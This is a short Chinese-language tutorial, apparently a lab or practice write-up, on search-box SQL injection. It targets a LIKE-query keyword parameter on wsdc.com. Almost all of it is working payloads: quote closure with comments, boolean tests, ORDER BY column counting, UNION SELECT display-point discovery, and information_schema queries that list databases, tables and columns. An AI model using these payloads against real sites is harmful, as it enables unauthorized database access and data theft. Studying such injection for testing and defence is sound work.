搜索型注入

原理是运用模糊查询：

select * from users where username like '%a%'

1.找到具有模糊查询的搜索框的注入点

2.构造闭合

因为模糊查询的代码是

select * from users where username like '%a%'

所以应该

鱼%’ -- s

判断构造闭合的函数是否正确

鱼%' and 1=1 -- s

http://www.wsdc.com/views/search_p.php?keyword=鱼%' and 1=1 -- s

http://www.wsdc.com/views/search_p.php?keyword=鱼%' and 1=2 -- s

证明闭合成功

3.查询字段数

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 10 -- s

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 5 -- s

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 7 -- s

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 8 -- s

所以说字段数为7

4.union联合查询，判断回显点

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,2,3,4,5,6,7 -- s

所以说回显点为2和6

5.查询数据库

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,6,7 -- s

6.查询表名

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,group_concat(table_name) ,7 from information_schema.tables where table_schema="food_db" -- s

7.查询字段

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,group_concat(column_name) ,7 from information_schema.columns where table_schema="food_db" and table_name="collection" -- s